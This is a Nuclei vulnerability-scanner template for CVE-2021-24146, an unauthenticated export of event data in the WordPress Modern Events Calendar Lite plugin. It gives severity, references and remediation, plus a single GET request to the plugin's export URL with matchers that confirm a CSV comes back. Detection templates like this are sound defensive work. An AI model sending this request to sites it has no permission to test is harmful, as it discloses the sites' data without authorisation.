nuclei-templates/http/cves/2021/CVE-2021-24146.yaml

48 lines
1.7 KiB
YAML
Raw Normal View History

2021-04-23 03:17:52 +00:00
id: CVE-2021-24146
info:
name: WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure
author: random_robbie
2021-04-23 03:17:52 +00:00
severity: high
description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format.
2023-09-06 12:09:01 +00:00
remediation: |
Update to the latest version of the Modern Events Calendar Lite plugin (5.16.5 or higher) to fix the vulnerability.
reference:
- https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc
- http://packetstormsecurity.com/files/163345/WordPress-Modern-Events-Calendar-5.16.2-Information-Disclosure.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-24146
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2021-24146
cwe-id: CWE-862,CWE-284
epss-score: 0.0212
epss-percentile: 0.8795
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: webnus
product: modern_events_calendar_lite
2023-09-06 12:09:01 +00:00
framework: wordpress
2023-07-11 19:49:27 +00:00
tags: cve2021,wpscan,packetstorm,wordpress,wp-plugin,cve
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: header
words:
- "mec-events"
2021-06-17 01:16:54 +00:00
- "text/csv"
condition: and
2021-04-23 03:08:45 +00:00
- type: status
status:
- 200
# digest: 490a0046304402200a249689c37c0e9918e1e56fc4be854513dcb630b8800f99a57c7d73d93fb6cf0220403b5d1db94d6c84cbb5b1a5386b60dff692aa250d3f6635e1e367de569ae536:922c64590222798bb761d5b6d8e72950